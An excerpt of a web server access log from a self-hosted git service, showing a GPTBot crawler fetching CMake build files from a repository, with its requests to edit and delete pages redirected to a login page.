+[17/Feb/2026:18:45:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:45:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 983] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:18:45:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:45:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9875] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:18:45:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9878] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:45:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 17130] [Gzip 7.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:45:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11871] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:45:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 10139] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:46:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:46:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:46:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:46:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:46:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:46:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:46:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:46:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:46:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33599] [Gzip 10.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:18:46:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33906] [Gzip 10.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:18:46:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33893] [Gzip 10.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:18:46:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:18:46:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:18:46:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11101] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:46:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9870] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:18:46:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:46:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 955] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:46:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 965] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:46:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:46:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9864] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:18:46:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:18:46:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 981] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:18:46:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:46:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:46:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42718] [Gzip 19.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:18:46:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 1001] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:46:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:46:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:46:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:46:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:46:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:46:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:46:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:46:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9876] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:18:46:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9889] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:46:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:46:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 993] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:46:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43373] [Gzip 19.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:46:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:18:46:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:18:46:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43362] [Gzip 19.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:46:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9884] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:18:46:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9862] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:46:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:46:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11095] [Gzip 